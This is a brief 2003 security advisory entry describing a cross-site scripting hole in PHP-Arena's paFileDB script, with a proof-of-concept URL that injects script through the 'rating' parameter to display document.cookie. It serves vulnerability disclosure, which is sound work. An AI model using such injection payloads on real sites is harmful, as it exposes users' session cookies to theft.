26th Mar 2003 [SBWID-6091]
COMMAND
	PHP-Arena XSS
SYSTEMS AFFECTED
	PHP-Arena v?
PROBLEM
	Thanks to dEcKa [[email protected]] kind advisory :
	The Example Is Like This. Its So Simple:-
	
	http://target/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=[script] 
	
	Fast Example:-
	
	http://target/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=<scr!pt>alert(document.cookie)</scr!pt> 
	
	Done. So Simple Rite. The Problem Is In paFileDB Management Script.
SOLUTION
	?